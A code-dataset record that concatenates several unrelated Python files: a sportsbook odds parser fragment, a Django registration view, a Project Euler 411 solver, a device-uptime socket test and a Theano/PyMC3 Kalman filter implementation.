home_team_code = \"KC\"\n\n away_team_name = MLB_TEAM_NAMES[away_team_code]\n home_team_name = MLB_TEAM_NAMES[home_team_code]\n\n away_odds = item[\"lines\"][0][\"visitor_odds_t\"]\n home_odds = item[\"lines\"][0][\"home_odds_t\"]\n over_total = item[\"lines\"][0][\"over_total\"]\n over_odds_total = item[\"lines\"][0][\"over_odds_total\"]\n under_total = item[\"lines\"][0][\"under_total\"]\n under_odds_total = item[\"lines\"][0][\"under_odds_total\"]\n away_spread = 
item[\"lines\"][0][\"visitor_spread_t\"]\n away_spread_odds = item[\"lines\"][0][\"visitor_spread_odds_t\"]\n home_spread = item[\"lines\"][0][\"home_spread_t\"]\n home_spread_odds = item[\"lines\"][0][\"home_spread_odds_t\"]\n\n if away_odds == '':\n away_odds = 0\n\n if home_odds == '':\n home_odds = 0\n\n if away_spread == '':\n away_spread = 0\n\n if home_spread == '':\n home_spread = 0\n\n if away_spread_odds == '':\n away_spread_odds = 0\n\n if home_spread_odds == '':\n home_spread_odds = 0\n\n game_cleaned = dict(\n game_id=game_id,\n away_team_name=away_team_name,\n home_team_name=home_team_name,\n game_date=item[\"game_date\"],\n game_time=item[\"game_time\"],\n game_datetime=item[\"game_date_time\"][\"date\"],\n game_tz=item[\"game_date_time\"][\"timezone\"],\n away_pitcher=item[\"visitor_pitcher\"],\n home_pitcher=item[\"home_pitcher\"],\n away_odds=away_odds,\n home_odds=home_odds,\n over_total=over_total,\n over_odds_total=over_odds_total,\n under_total=under_total,\n under_odds_total=under_odds_total,\n away_spread=away_spread,\n away_spread_odds=away_spread_odds,\n home_spread=home_spread,\n home_spread_odds=home_spread_odds\n )\n cleaned_data.append(game_cleaned)\n return cleaned_data\n\n", "sub_path": "parsers/mybookie_parser.py", "file_name": "mybookie_parser.py", "file_ext": "py", "file_size_in_byte": 6430, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.post", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 76, "usage_type": "call"}, {"api_name": "fivethirtyeight_parser.MLB_TEAM_NAMES", "line_number": 147, "usage_type": "name"}, {"api_name": "fivethirtyeight_parser.MLB_TEAM_NAMES", "line_number": 148, "usage_type": "name"}]} +{"seq_id": "156154017", "text": "from django.shortcuts import render, redirect\nfrom .import forms\nfrom .models import Eventreg\n\n\ndef Eventregister(request):\n login_id = request.session['logid']\n model_object = Eventreg.objects.filter(id=login_id)\n\n if request.method == 'POST':\n form = forms.EventregForm(request.POST, request.FILES)\n if form.is_valid():\n regobj = form.cleaned_data\n eventid = regobj['event_id']\n eventregno = regobj['event_reg_no']\n a = Eventreg(event_id=eventid, event_reg_no=eventregno, id=login_id)\n a.save()\n return redirect('eventreg:EventregForm')\n else:\n form = forms.EventregForm\n return render(request, \"eventreg/eventreg.html\", {'form': form, 'data': model_object})\n\n\n", "sub_path": "Festhub/eventreg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 762, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Eventreg.objects.filter", "line_number": 8, "usage_type": "call"}, {"api_name": "models.Eventreg.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "models.Eventreg", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Eventreg", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "346591113", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n1 1 1\n13 6 8\n167 162 6\n266 11 256\n2500 2500 2500\n653 167 13\n14406 7203 14406\n8207 16 8192\n39376 39366 11\n5005 2505 5000\n146410 146410 6655\n20746 172 261\n342732 342732 85683\n57629 7208 57624\n202505 202500 2505\n262164 21 
262144\n1336336 668168 1336336\n157474 39371 18\n2345778 2345778 2345778\n160010 2510 160000\n388967 388962 14411\n585645 146415 53240\n3078251 3078251 3078251\n663567 177 8197\n7812500 7812500 7812500\n685469 342737 685464\n9565953 9565938 16\n1843978 7213 1843968\n19803868 19803868 19803868\n405005 202505 5005\n\n\n1 (1, 1) (1, 1)\n2 (1, 5) (8, 0)\n3 (162, 0) (1, 5)\n4 (1, 10) (256, 0)\n5 (2500, 0) (2500, 0)\n6 (162, 5) (8, 5)\n7 (7203, 0) (14406, 0)\n8 (1, 15) (8192, 0)\n9 (39366, 0) (1, 10)\n10 (2500, 5) (5000, 0)\n11 (146410, 0) (6655, 0)\n12 (162, 10) (256, 5)\n13 (342732, 0) (85683, 0)\n14 (7203, 5) (57624, 0)\n15 (202500, 0) (2500, 5)\n16 (1, 20) (262144, 0)\n17 (668168, 0) (1336336, 0)\n18 (39366, 5) (8, 10)\n\n[(1, 1),\n (2, 13),\n (3, 167),\n (4, 266),\n (5, 2500),\n (6, 653),\n (7, 14406),\n (8, 8207),\n (9, 39376),\n (10, 5005),\n (11, 146410),\n (12, 20746),\n (13, 342732),\n (14, 57629),\n (15, 202505),\n (16, 262164),\n (17, 1336336),\n (18, 157474),\n (19, 2345778),\n (20, 160010),\n (21, 388967),\n (22, 585645),\n (23, 3078251),\n (24, 663567),\n (25, 7812500),\n (26, 685469),\n (27, 9565953),\n (28, 1843978),\n (29, 19803868),\n (30, 405005)]\n\nhttps://oeis.org/A220024\n\nCreated on Wed Feb 7 05:12:39 2018\n@author: mbh\n\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n\nimport matplotlib.pyplot as plt\nimport itertools\nimport numpy as np\nimport math\nimport time\nimport bisect\nimport numba as nb\n\ndef p411(N):\n    t0=time.clock()\n    total=0\n\n    for n in range(2,N+1):\n        t=time.clock()\n        l2,m2=cycle(2,n**5)\n        l3,m3=cycle(3,n**5)\n        ndistinct=max(m3,m2)+l2*l3//math.gcd(l2,l3)\n        p=points(n**5,ndistinct)\n        newVal=lndss(p)\n        total += newVal\n        print(\"%2d %8d %6.3f %6.3f\" % (n,newVal,time.clock()-t,time.clock()-t0))\n    print(1+total)\n    print(time.clock()-t0)\n\n\n#https://stackoverflow.com/questions/2631726/how-to-determine-the-longest-increasing-subsequence-using-dynamic-programming\n# find length of longest non-decreasing subsequence of list X\ndef lndss(X):\n    if len(X)==0: return 0\n    S=[X[0]]\n    for i in range(1,len(X)):\n        if X[i]>=S[-1]:\n            S.append(X[i])\n        else:\n            index=bisect.bisect_right(S,X[i])\n#            print(index,len(S),X[i],S)\n            S[index]=X[i]\n    return len(S)\n\n#returns smallest k for which gcd(a^k,m)=gcd(a^(k+1),m)\n#@nb.jit(nopython=True)\ndef k0(a,m):\n\n    dk,k=0,0\n    while 1:\n        dknew=math.gcd(a**k,m)\n        if dknew==dk:\n            return k-1\n        dk=dknew\n        k+=1\n\n#returns cycle period and offset of a^k mod m\ndef cycle(a,m):\n\n    k=k0(a,m)\n    for d in sorted(divisors(et(m))):\n        if pow(a,k,m)==pow(a,k+d,m):\n#        if (a**k)%m==(a**(k+d))%m:\n            return d,k\n\n#find the points (2^i mod n, 3^i mod n) for 0<=i<=2n\n@nb.jit(nopython=True)\ndef points(n,ndistinct):\n\n#    pairs=[]\n    pairs = [(0,0)]*ndistinct#[None for x in range(ndistinct)]\n#    pairs=np.array(ndistinct,dtype=np.int64)\n#    pairs=np.zeros((ndistinct,2),dtype=np.int64)\n    for i in range(ndistinct):\n#        newx=(2**i)%n#pow(2,i,n)\n#        newy=(3**i)%n#pow(3,i,n)\n#        newx=pow(2,i,n)\n#        newy=pow(3,i,n)\n        newx=f(2,i,n)\n        newy=f(3,i,n)\n\n        pairs[i]=(newx,newy)\n\n#    return\n#    pairs.append((newx,newy))\n\n    return [y for x,y in sorted(pairs)]\n\n#modular exponentiation: find x^e mod m\n@nb.jit(nopython=True)\ndef f(x,e,m):\n    X = x\n    E = e\n    Y = 1\n    while E > 0:\n        if E % 2 == 0:\n            X = (X * X) % m\n            E = E // 2  # integer halving (E is even here); plain / would give a float\n        else:\n            Y = (X * Y) % m\n            E = E - 1\n    return Y\n\n
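# --- Added note (illustrative, not in the original) ---\n# f() is right-to-left square-and-multiply modular exponentiation;\n# for integer inputs it should agree with the built-in 3-argument pow:\n#\n#   assert f(2, 100, 97) == pow(2, 100, 97)\n#   assert all(f(3, e, 1000) == pow(3, e, 1000) for e in range(50))\n# ------------------------------------------------------\n\n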
def test(n):\n    # both timing helpers in the original (myGlss and\n    # get_longest_increasing_subsequence_length) are undefined here;\n    # lndss above is used instead, and ~2n points are assumed (see points()).\n    y=points(n,2*n)\n    t=time.clock()\n    l=lndss(y)\n    print(l,time.clock()-t)\n    t=time.clock()\n    l=lndss(y)\n    print(l,time.clock()-t)\n\ndef xp():\n    t=time.clock()\n#    cycles=[]\n    for k in range(2,31):\n\n        et2=cycle_v1(2,k**5,1)\n        et3=cycle_v1(3,k**5,1)\n\n        print(k,et2,et3)\n    print(time.clock()-t)\n\n\n#returns cycle length and offset of k^i mod n\ndef cycle_v1(k,n,x0):\n\n    f =lambda i,n: (k*i)%n\n#    f = lambda x,n: (n*0 + x * x + 1) % 255\n    lam, mu = brent(f, x0,n)\n#    print(\"Cycle length: %d\" % lam)\n#    print(\"Cycle start index: %d\" % mu)\n#    print(list(itertools.islice(iterate(f, x0,n), mu, mu+lam)))\n\n    return lam,mu\n\n#from Rosetta Code\n#https://rosettacode.org/wiki/Cycle_detection#Python\n\nimport itertools\ndef brent_length(f, x0,n):\n    # main phase: search successive powers of two\n    hare = x0\n    power = 1\n    while True:\n        tortoise = hare\n        for i in range(1, power+1):\n            hare = f(hare,n)\n            if tortoise == hare:\n                return i\n        power *= 2\n\ndef brent(f, x0,n):\n    lam = brent_length(f, x0,n)\n\n    # Find the position of the first repetition of length lam\n    mu = 0\n    hare = x0\n    for i in range(lam):\n        # range(lam) produces a list with the values 0, 1, ... , lam-1\n        hare = f(hare,n)\n#        print(i,hare)\n    # The distance between the hare and tortoise is now lam.\n\n    # Next, the hare and tortoise move at same speed until they agree\n    tortoise = x0\n    while tortoise != hare:\n        tortoise = f(tortoise,n)\n        hare = f(hare,n)\n        mu += 1\n\n    return lam, mu\n\ndef iterate(f, x0,n):\n    while True:\n        yield x0\n        x0 = f(x0,n)\n\n#if __name__ == '__main__':\n#    f = f=lambda i,n: (2**i) %n\n#    x0,n = 0,22\n#    lam, mu = brent(f, x0,n)\n#    print(\"Cycle length: %d\" % lam)\n#    print(\"Cycle start index: %d\" % mu)\n#    print(\"Cycle: %s\" % list(itertools.islice(iterate(f, x0,n), mu, mu+lam)))\n\n@nb.jit(nopython=True)\ndef et(n):\n    \"\"\"returns Euler totient (phi) of n \"\"\"\n    phi=n\n    pfs=set(prime_factors(n))\n    for pf in pfs:\n        phi*=(1-1/pf)\n    return int(phi)\n\n#@nb.jit(nopython=True)\ndef divisors(n):\n    \"\"\"returns the divisors of n\"\"\"\n    #first get the prime factors\n    i = 2\n    fs = {}\n    while i * i <= n:\n        if n % i:\n            i += 1\n        else:\n            n //= i\n            fs[i]=fs.get(i,0)+1\n    if n > 1:\n        fs[n]=fs.get(n,0)+1\n\n    ps=[k for k,v in fs.items()] #prime factors\n    es=[v for k,v in fs.items()] #exponents\n\n    divs=[]\n    nfactors = len(ps)\n    f = [0] * nfactors\n    while True:\n        p=1\n        pfs=[x**y for (x,y) in zip(ps,f)]\n        for i in range(len(ps)):\n            p*=pfs[i]\n        divs.append(p)\n#could use this from np, but is several times slower for large numbers\n#        yield ft.reduce(lambda x, y: x*y, [factors[x][0]**f[x] for x in range(nfactors)], 1)\n        i = 0\n        while True:\n            f[i] += 1\n            if f[i] <= es[i]:\n                break\n            f[i] = 0\n            i += 1\n            if i >= nfactors:\n                return divs\n\n@nb.jit(nopython=True)\ndef prime_factors(n):\n    \"\"\"returns the prime factors of n\"\"\"\n    i = 2\n    factors = []\n    while i * i <= n:\n        if n % i:\n            i += 1\n        else:\n            n //= i\n            factors.append(i)\n    if n > 1:\n        factors.append(n)\n    return factors\n\ndef radixsort( aList ):\n    RADIX = 10\n    maxLength = False\n    tmp , placement = -1, 1\n\n    while not maxLength:\n        maxLength = True\n        # declare and initialize buckets\n        buckets = [list() for _ in range( RADIX )]\n\n        # split aList between lists (LSD radix sort over a list of ints;\n        # the original indexed i[1] and used float division, which fails here)\n        for i in aList:\n            tmp = i // placement\n            buckets[tmp % RADIX].append( i )\n            if maxLength and tmp > 0:\n                maxLength = False\n\n        # empty lists into aList array\n        a = 0\n        for b in range( RADIX ):\n            buck = buckets[b]\n            for i in buck:\n                aList[a] = i\n                a += 1\n\n        # move to next digit\n        placement *= RADIX\n\n\n#import time, bisect\n\n\ndef generate_points(n):\n    
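# Added note (not in the original): this walks the orbit of\n    # (x, y) = (3^i mod n, 2^i mod n) starting from (1, 1), recording every\n    # y value seen at each x, and stops at the first repeated pair.\n    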
if n == 1: return [[0]]\n points = [None for x in range(n)]\n x = 1; y = 1\n points[x] = y\n while True:\n x = (3 * x) % n\n y = (2 * y) % n\n ys = points[x]\n if ys is None:\n points[x] = y\n elif type(ys) is int:\n if y == ys:\n break\n points[x] = {y, ys}\n else:\n if y in ys:\n break\n ys.add(y)\n return(points)\n\ndef find_path(points):\n s = []\n for ys in points:\n if type(ys) is int:\n ix = bisect.bisect_right(s, ys)\n if ix >= len(s):\n s.append(ys)\n else:\n s[ix] = ys\n elif ys is not None:\n ix = 0\n for y in sorted(ys):\n ix = bisect.bisect_right(s, y, lo=ix)\n if ix >= len(s):\n s.append(y)\n else:\n s[ix] = y\n return len(s)\n\ndef t411(n):\n sigma = 0\n t0 = time.time()\n for k in range(1, n + 1):\n t1 = time.time()\n points = generate_points(k**5)\n t2 = time.time()\n s = find_path(points)\n sigma += s\n t3 = time.time()\n print(\"%2d %8d %8d %6.3f %6.3f %6.3f\" % (k, sigma, s, t2 - t1, t3 - t2, t3 - t0))\n return sigma\n\n#https://gist.github.com/JonathanSpeek/1f4c7c283c7c3c475ee13d57381765d8\ndef binary_search(a_list, item):\n \"\"\"Performs iterative binary search to find the position of an integer in a given, sorted, list.\n a_list -- sorted list of integers\n item -- integer you are searching for the position of\n \"\"\"\n\n first = 0\n last = len(a_list) - 1\n\n while first <= last:\n i = (first + last) // 2\n\n if a_list[i] == item:\n return i\n# return '{item} found at position {i}'.format(item=item, i=i)\n elif a_list[i] > item:\n last = i - 1\n elif a_list[i] < item:\n first = i + 1\n else:\n print( '{item} not found in the list'.format(item=item))", "sub_path": "PE_0411/PE_0411.py", "file_name": "PE_0411.py", "file_ext": "py", "file_size_in_byte": 9953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.clock", "line_number": 102, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 106, "usage_type": "call"}, {"api_name": "math.gcd", "line_number": 109, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 113, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 115, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 127, "usage_type": "call"}, {"api_name": "math.gcd", "line_number": 138, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 154, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 179, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 195, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 198, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 199, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 202, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 205, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 213, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 278, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 326, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 398, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 406, "usage_type": "call"}, {"api_name": "time.time", "line_number": 415, "usage_type": "call"}, {"api_name": "time.time", "line_number": 417, "usage_type": "call"}, {"api_name": "time.time", "line_number": 419, "usage_type": "call"}, {"api_name": "time.time", "line_number": 422, "usage_type": "call"}]} +{"seq_id": "319030651", "text": "import socket\nimport sys\nimport datetime\nimport time\n\n#inspired by 
http://planzero.org/blog/2012/01/26/system_uptime_in_python,_a_better_way\ndef uptime():\n\twith open('/proc/uptime','r') as f:\n\t\tuptime_seconds = float(f.readline().split()[0])\n\t\treturn str(uptime_seconds)\n\n\n#create an INET, STREAMing socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n#now connect\ns.connect(('colton.cybernetics.ro',8888))\n\n#mysql seems to expect YYYY-MM-DD HH:MM:SS.SSSSSS\n#s.send(str(datetime.datetime.now().time()))\n#encode to bytes, as socket.send requires on Python 3\ns.send((\"'\" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\") + \"',1,\" + uptime()).encode('utf-8'))\n\ntime.sleep(2)\n\nresponse = s.recv(1024)\n\nprint(response)\n\ns.close()\n", "sub_path": "wirfi-device-backup/python/socketTest.py", "file_name": "socketTest.py", "file_ext": "py", "file_size_in_byte": 672, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 14, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 14, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}]} {"seq_id": "91536382", "text": "import numpy as np\nimport theano\nimport theano.tensor as tt\n\nfrom pymc3.distributions import Continuous\n\nsolve_l = tt.slinalg.solve_lower_triangular\nsolve_u = tt.slinalg.solve_upper_triangular\n\n__all__ = ['KalmanTheano', 'KalmanFilter']\n\n\nclass DimensionalityError(Exception):\n    pass\n\n\ndef _filter(y, Phi, Q, L, c, H, Sv, d, s, P):\n    \"\"\"\n    Perform one filtering step, the previous state estimate being given\n    by (s, P). The rest of the arguments are parameters for the state\n    space model.\n    \"\"\"\n    s_fwd, P_fwd, y_est, y_est_var = _predict(s, P, Phi, Q, L, c, H, Sv, d)\n\n    # Cholesky factor and estimation error\n    Ly_est_var = tt.slinalg.cholesky(y_est_var)\n    err = y - y_est\n\n    # make corrections\n    s_cor, P_cor = _correct(s_fwd, Ly_est_var, err, P_fwd, Phi, H)\n\n    # Accumulate loglikelihood\n    log_l = _log_likelihood(err, Ly_est_var)\n    return s_cor, P_cor, log_l\n\n\ndef _predict(s, P, Phi, Q, L, c, H, Sv, d):\n    \"\"\"\n    Kalman filter prediction step\n    \"\"\"\n    # State propagation\n    s_fwd = tt.dot(Phi, s) + c\n    P_fwd = tt.dot(tt.dot(Phi, P), Phi.T) + tt.dot(tt.dot(L, Q), L.T)\n\n    # Output estimate and uncertainty\n    y_est = tt.dot(H, s_fwd) + d\n    y_est_var = tt.dot(tt.dot(H, P_fwd), H.T) + Sv\n    return s_fwd, P_fwd, y_est, y_est_var\n\n\ndef _correct(s_fwd, Ly, err, P_fwd, Phi, H):\n    K = tt.dot(P_fwd, solve_u(Ly.T, solve_l(Ly, H)).T)\n    s_cor = s_fwd + tt.dot(K, err)\n    KL = tt.dot(K, Ly)\n    P_cor = P_fwd - tt.dot(KL, KL.T)\n    return s_cor, P_cor\n\n\ndef _log_likelihood(err, Ly):\n    n = err.shape[0]  # Number of dimensions\n\n    # log|S| = 2 * sum(log(diag(Ly))) for S = Ly Ly^T, hence the factor 2\n    logdet = tt.log(tt.diag(Ly)).sum()\n    vTSv = tt.nlinalg.norm(solve_l(Ly, err), 2)**2\n    return -0.5 * (n * np.log(2 * np.pi) + 2 * logdet + vTSv)\n\n
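# --- Added note (illustrative, not in the original) ---\n# For err ~ N(0, S) with S = Ly Ly^T (Ly lower-triangular), the\n# log-density is\n#   -0.5 * (n*log(2*pi) + log|S| + err^T S^{-1} err),\n# and err^T S^{-1} err is computed stably as ||solve_l(Ly, err)||^2\n# rather than by forming S^{-1} explicitly.\n# ------------------------------------------------------\n\n\n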
class KalmanTheano(object):\n    def __init__(self, Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g):\n        # NOTE: If identical matrices happen to be passed in, theano\n        # NOTE: will recognize this and use references. This can be\n        # NOTE: confusing as the names given below need not \"stick\".\n\n        # State transition\n        self.Phi = tt.as_tensor_variable(Phi, name=\"Phi\")\n\n        # State innovations\n        self.Q = tt.as_tensor_variable(Q, name=\"Q\")\n\n        # Innovations modifier\n        self.L = tt.as_tensor_variable(L, name=\"L\")\n\n        # State structural component\n        self.c = tt.as_tensor_variable(c, name=\"c\")\n\n        # Observation matrix\n        self.H = tt.as_tensor_variable(H, name=\"H\")\n\n        # Observation noise variance\n        self.Sv = tt.as_tensor_variable(Sv, name=\"Sv\")\n\n        # Observation structural component\n        self.d = tt.as_tensor_variable(d, name=\"d\")\n\n        # Initial state mean\n        self.s0 = tt.as_tensor_variable(s0, name=\"s0\")\n\n        # Initial state variance\n        self.P0 = tt.as_tensor_variable(P0, name=\"P0\")\n\n        self.n = n  # Output dimension\n        self.m = m  # State dimension\n        self.g = g  # Innovations dimension (often m == g)\n\n        self.tensors = [self.Phi, self.Q, self.L, self.c,\n                        self.H, self.Sv, self.d]\n        self.tensor_names = [\"Phi\", \"Q\", \"L\", \"c\",\n                             \"H\", \"Sv\", \"d\"]\n        self.tensor_dims = [2, 2, 2, 1, 2, 2, 1]  # Matrix or vector\n\n        self._validate()\n        return\n\n    def _validate(self):\n        sequences = []\n        non_sequences = []\n\n        def is_seq(tnsr, dim=1):\n            ndim = tnsr.ndim\n            if ndim == dim:\n                return False\n            elif ndim == dim + 1:\n                return True\n            else:\n                raise DimensionalityError(\n                    \"Variable {} has {} dimensions, but \"\n                    \"should have only {} or {}\"\n                    \"\".format(tnsr.name, ndim, dim, dim + 1))\n\n        def append_seq(name, tnsr, expected_dim=1):\n            # the original tested is_seq(tnsr, dim), silently relying on the\n            # enclosing loop variable; the parameter is used instead here\n            if is_seq(tnsr, expected_dim):\n                sequences.append((tnsr, name))\n            else:\n                non_sequences.append((tnsr, name))\n\n        for name, tnsr, dim in zip(self.tensor_names,\n                                   self.tensors,\n                                   self.tensor_dims):\n            append_seq(name, tnsr, dim)\n\n        self.sequences = sequences\n        self.non_sequences = non_sequences\n        return\n\n
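    # Added note (not in the original): filter() below builds a step\n    # function whose argument order matches theano.scan's convention\n    # (sequences first, then recurrent outputs, then non-sequences);\n    # scan threads the state mean/covariance (s, P) through time and the\n    # per-step log-likelihoods are summed at the end.\n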
    def filter(self, Y, **th_scan_kwargs):\n        # Create function with correct ordering for scan\n        fn = eval(\n            \"lambda {}: _filter(y, Phi, Q, L, c, H, Sv, d, s, P)\"\n            \"\".format(\",\".join(\n                [\"y\"] +\n                [tnsr_name[1] for tnsr_name in self.sequences] +\n                [\"s\", \"P\"] +\n                [tnsr_name[1] for tnsr_name in self.non_sequences])))\n\n        (st, Pt, log_l), updates = theano.scan(\n            fn=fn,\n            sequences=[Y] + [tnsr_name[0] for tnsr_name in self.sequences],\n            outputs_info=[dict(initial=self.s0),\n                          dict(initial=self.P0),\n                          None],\n            non_sequences=[tnsr_name[0] for tnsr_name in self.non_sequences],\n            strict=True,\n            **th_scan_kwargs)\n        return (st, Pt, log_l.sum()), updates\n\n\nclass KalmanFilter(Continuous):\n    \"\"\"\n    Implements a generic Kalman filter in general state space form.\n\n    Shape of the input tensors is given as a function of:\n\n    * T: number of time steps,\n    * n: size of the observation vector\n    * m: size of the state vector\n    * g: size of the disturbance vector in the transition equation\n\n    The following rules define tensor dimension reductions allowed:\n\n    * If a tensor is time-invariant, the time dimension T can be omitted\n    * If n=1, all dimensions of size n can be omitted\n    * If m=1 and g=1, all dimensions of size m and g can be omitted\n\n    Parameters\n    ----------\n    Phi : tensor or numpy array, dimensions T x m x m\n        Tensor relating the state vectors at times t - 1, t\n    c : tensor or numpy array, dimensions T x m\n        Offset in the state transition equation\n    Q : tensor or numpy array, dimensions T x g x g\n        Covariance matrix of the disturbances in the transition equation\n    L : tensor or numpy array, dimensions T x m x g\n        Tensor applying transition equation disturbances to state space\n    H : tensor or numpy array, dimensions T x n x m\n        Tensor relating observation and state vectors\n    d : tensor or numpy array, dimensions T x n\n        Shift in the observation equation\n    Sv : tensor or numpy array, dimensions T x n x n\n        Covariance for the observation noise\n    s0 : tensor or numpy array, dimensions m\n        Mean of the initial state vector\n    P0 : tensor or numpy array, dimensions m x m\n        Covariance of the initial state vector\n    *args, **kwargs\n        Extra arguments passed to :class:`Continuous` initialization\n\n    Notes\n    -----\n\n    The general state space form (SSF) applies to a multivariate time series,\n    y(t), containing n elements. We suppose that there is some underlying\n    or background \"state\" s(t) containing m elements:\n\n    .. math :\n\n        s(t) = Phi(t) s(t-1) + c(t) + L(t) w(t)\\\\,\\\\qquad\n        w(t) \\\\sim \\\\mathcal{N}_g(0, Q(t))\\\\\n        s(0) \\\\sim \\\\mathcal{N}_m(s0, P0)\n\n    These state variables generate the data via the \"observation\" equations:\n\n    .. math :\n\n        y(t) = H(t) s(t) + d(t) + v(t)\\\\,\\\\qquad\n        v(t) \\\\sim \\\\mathcal{N}_n(0, Sv(t))\\\\ ,\n\n    Although s(t) is typically not observable, its dynamics are governed by a\n    first-order Gauss-Markov process. The entire model is amenable to\n    exact inference.\n\n    The matrix L (which would correspond to a cholesky factor of the state\n    variance if Q = I) can be used to linearly transform the state innovations\n    w(t) and can be useful for modelling low-rank innovations.\n    \"\"\"\n    def __init__(self, Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g,\n                 *args, **kwargs):\n        Continuous.__init__(self, *args, **kwargs)\n\n        # KalmanTheano accepts no extra keyword arguments; kwargs are\n        # consumed by Continuous above.\n        self._kalman_theano = KalmanTheano(Phi, Q, L, c, H, Sv, d, s0, P0,\n                                           n, m, g)\n        self.mean = tt.as_tensor_variable(0.)\n        return\n\n    def logp(self, Y):\n        (_, _, log_p), _ = self._kalman_theano.filter(Y)\n        return log_p\n\n\nif __name__ == \"NONAME\":\n    n = 3\n    m = 10\n\n    T = 2048\n    phi = 0.99\n    v = np.random.normal(size=(T, m))\n    Y = np.zeros((T, m))\n    Y[0, :] = v[0, :]\n    for t, vt in enumerate(v[1:]):\n        Y[t + 1, :] = phi * Y[t, :] + vt\n\n    sv_tnsr = tt.vector(\"sv\")\n    Sv_tnsr = tt.diag(sv_tnsr)\n\n    # def __init__(self, Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g,\n    K = KalmanTheano(Phi=0.92 * np.eye(n), Q=0.2 * np.eye(n),\n                     L=np.eye(n), c=np.zeros(n),\n                     H=np.random.normal(size=(m, n)),\n                     Sv=Sv_tnsr,\n                     d=np.zeros(m),\n                     s0=np.zeros(n),\n                     P0=10 * np.eye(n),\n                     n=n, m=m, g=n)\n    Y_tensor = tt.matrix(\"Y\")\n    (s, P, ll), _ = K.filter(Y_tensor)\n    kf = theano.function(inputs=[Y_tensor, sv_tnsr], outputs=[s, P, ll],\n                         mode=theano.Mode(optimizer=\"unsafe\"))\n\n    s, P, ll = kf(Y, 2 * np.ones(m))\n\n    import pymc3 as pm\n\n    with pm.Model() as model:\n        # Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g\n\n        phi = pm.Normal(\"phi\", shape=(1, 1))\n        q = pm.HalfStudentT(\"q\", nu=1.0, sd=2.0, shape=(1, 1))\n        K = KalmanFilter(\"kf\", phi, q,\n                         np.array([[1.]]),\n                         np.array([0.]),\n                         np.array([[1.]]),\n                         np.array([[0.0]]),\n                         np.array([0.]),\n                         np.array([0.]),\n                         np.array([[10.]]),\n                         1, 1, 1,\n                         observed=Y)\n\n    with model:\n        # approx = pm.fit(n=100, method=\"advi\")\n        trace = pm.sample_approx(approx, draws=500)\n", "sub_path": "kalman/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 9969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "theano.tensor.slinalg", "line_number": 7, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 7, "usage_type": "name"}, {"api_name": "theano.tensor.slinalg", "line_number": 8, 
"usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 8, "usage_type": "name"}, {"api_name": "theano.tensor.slinalg.cholesky", "line_number": 26, "usage_type": "call"}, {"api_name": "theano.tensor.slinalg", "line_number": 26, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 26, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 42, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 42, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 43, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 43, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 46, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 47, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 47, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 52, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 52, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 53, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 53, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 54, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 54, "usage_type": "name"}, {"api_name": "theano.tensor.dot", "line_number": 55, "usage_type": 